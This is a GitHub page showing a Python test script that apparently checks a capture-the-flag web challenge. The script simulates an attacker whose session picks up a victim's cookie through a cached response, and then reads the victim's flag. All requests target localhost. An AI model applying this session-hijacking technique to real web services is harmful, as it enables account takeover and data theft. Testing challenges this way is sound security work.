This repository was archived by the owner on Dec 1, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtester.py
More file actions
118 lines (100 loc) · 3.09 KB
/
tester.py
File metadata and controls
118 lines (100 loc) · 3.09 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
import requests
import sys
import json
import time
BASE = "http://127.0.0.1:9090"
#BASE = "http://localhost:5000"
COOKIE_NAME = "session"
FLAG = "FLAG{TESTVAL}"
proxies = {
"http": "http://localhost:8080"
}
#proxies = None
def do_victim():
# Victim logs in, get cookie
s_victim = requests.Session()
login(s_victim, "Mr. Y", "b")
cookie_victim = s_victim.cookies[COOKIE_NAME]
# Victim loads missionlist
missions = get_missionlist(s_victim)
assert len(missions) >= 4
# Iterate missions, verify cookies after each one and send the post request
# The POST request will add the notes to the mission of the victim user, unless the cookie got replaced by a recently cached response
for mission in missions:
name = mission["name"]
print(f"\t.. getting missioninfo for {name}")
get_missioninfo(s_victim, name)
if name.startswith("imgs"):
assert s_victim.cookies[COOKIE_NAME] != cookie_victim
#else:
# assert s_victim.cookies[COOKIE_NAME] == cookie_victim
# POST
add_data(s_victim, f"We have a mission {mission['name']}. Statusupdate: {FLAG}")
logout(s_victim)
def test_directaccess():
s_attack = requests.Session()
login(s_attack, "Mr. R", "a")
data = get_data(s_attack, "a").content.decode()
assert FLAG not in data
# To get the flag, we want to enforce the knowledge of the password
# otherwise, you could simply get the victims cookie and retrieve the flag
# without creating your own mission
# This tests tries exactly this
def test_nopwd():
s_test = requests.Session()
login(s_test, "Mr. R", "a")
cookie = s_test.cookies[COOKIE_NAME]
get_missioninfo(s_test, "imgstest")
assert cookie != s_test.cookies[COOKIE_NAME] # Changed cookie
x = get_data(s_test)
assert x.status_code == 400
assert FLAG not in x.content.decode()
def login(session, mission, secret):
r = session.post(
f"{BASE}/api/authenticate",
json = {
"mission": mission,
"secret": secret
}, proxies = proxies)
def logout(session):
session.get(
f"{BASE}/api/logout"
, proxies = proxies)
def get_missioninfo(session, mission):
session.get(
f"{BASE}/api/missioninfo/{mission}"
, proxies = proxies)
def get_missionlist(session):
return session.get(
f"{BASE}/api/missions"
, proxies = proxies).json()
def add_data(session, data):
session.post(
f"{BASE}/api/add_data",
json = {
"data": data
}, proxies = proxies)
def get_data(session, secret = None):
j = {}
if secret != None:
j["secret"] = secret
return session.post(
f"{BASE}/api/get_data"
, json = j
, proxies = proxies)
# Sessions
s_attack = requests.Session()
# Attacker logs in, get cookie
login(s_attack, "imgstest", "d")
cookie_attack = s_attack.cookies[COOKIE_NAME]
# Attacker loads his own missioninfo
get_missioninfo(s_attack, "imgstest")
#assert s_attack.cookies[COOKIE_NAME] == cookie_attack # this fails when the test is run the second time before the cache expired
do_victim()
# Verify data in attacker
data = get_data(s_attack, "d") # get_data, but the s_attack session now has the s_victim cookie
assert FLAG in data.content.decode(), f"content is {data.content.decode()}"
logout(s_attack)
# further tests
test_directaccess()
test_nopwd()